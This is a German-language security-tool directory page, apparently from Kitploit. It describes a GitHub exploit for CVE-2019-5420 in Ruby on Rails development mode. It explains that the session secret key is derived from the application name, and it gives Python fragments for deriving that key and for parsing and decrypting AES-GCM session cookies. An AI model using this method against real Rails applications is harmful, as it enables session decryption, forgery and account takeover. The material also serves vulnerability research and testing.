Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5420 — Eine Schwachstelle kann es einem Angreifer ermöglichen, das automatisch generierte Geheimnis-Token des Entwicklungsmodus zu erraten. | Kitploit
Tools/GitHubGitHub/j4k0m/cve-2019-5420
Verschlüsselungs-/EntschlüsselungstoolsPasswortangriffeSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstests
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

Eine Schwachstelle kann es einem Angreifer ermöglichen, das automatisch generierte Geheimnis-Token des Entwicklungsmodus zu erraten.

Repository anzeigen
5vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-5420

Eine Sicherheitslücke kann es einem Angreifer ermöglichen, den automatisch generierten Entwicklungsmodus-Geheimtoken zu erraten.

Ruby-on-Rails, wenn es im Entwicklungsmodus läuft. Im Entwicklungsmodus ist es für einen Angreifer möglich, den Schlüssel zu erraten, der zum Sichern der Sitzungen verwendet wird.

Entschlüsselung:

Schlüsselgenerierung:

Rails verwendet 3 Umgebungen (Entwicklung, Test, Produktion). Wenn eine Anwendung den Entwicklungsmodus verwendet, können Sie den geheimen Token erraten und die verschlüsselte Sitzung entschlüsseln.

Der zum Schutz der Sitzung verwendete Schlüssel wird aus dem Namen der Anwendung abgeleitet.

Beispiel:

root@kitploit:~
rails new Jakom

Jakom: Anwendungsname.

Dadurch können wir erraten, dass der Schlüssel die Ausgabe der Generierungsmethode ist:

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

Wie wir hier sehen können:

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

Sitzung mit dem Schlüssel entschlüsseln:

In Rails werden Sitzungen mit AES-256-GCM verschlüsselt. Wenn Sie den Schlüssel haben, können Sie Sitzungen entschlüsseln/verschlüsseln.

Das Letzte, was Sie benötigen, ist das Format der Sitzung:

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

Entschlüsselungsbeispiel:

Wie wir hier sehen können:

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

Der erste Teil des Sitzungscookies sind die verschlüsselten Daten, der zweite Teil ist der IV, der dritte Teil ist das GCM-Tag (Authentifizierungstag). Mit diesen Informationen können wir unsere Sitzungen direkt entschlüsseln: image

Beispiel:

image

Tool herunterladen